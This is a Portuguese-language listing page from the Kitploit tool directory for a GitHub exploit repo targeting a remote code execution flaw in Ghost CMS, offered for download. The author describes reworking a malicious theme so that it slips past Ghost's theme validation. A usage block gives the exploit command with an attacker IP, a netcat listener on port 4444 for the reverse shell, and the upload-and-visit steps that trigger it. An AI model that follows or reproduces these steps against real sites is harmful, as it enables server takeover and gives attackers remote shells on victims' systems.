Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-29053 — Vulnerabilidade (RCE) descoberta no Ghost CMS (afetando especificamente as versões 0.7.2 a 6.19.0) | Kitploit
Ferramentas/GitHubGitHub/ac8999/cve-2026-29053
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubac8999/cve-2026-29053

CVE-2026-29053

Vulnerabilidade (RCE) descoberta no Ghost CMS (afetando especificamente as versões 0.7.2 a 6.19.0)

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Este é um retrabalho do Repo de rootxran para esta mesma CVE - https://github.com/rootxran/CVE-2026-29053

Durante testes contra ambientes específicos do Ghost CMS, o payload do tema original acionou um Erro Fatal do Handlebars. O CMS falhou ao ativar o tema malicioso porque ele referenciava um helper obsoleto ou ausente (social_url) dentro do arquivo author.hbs.

Atualizei os templates Handlebars para usar helpers nativos e compatíveis. Isso garante que o tema passe nas verificações internas de validação do Ghost, permitindo que o exploit seja ativado com sucesso sem ser bloqueado pelo parser de segurança do mecanismo de temas.

Uso: (consulte o exploit original para a orientação em vídeo).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/
Baixar ferramenta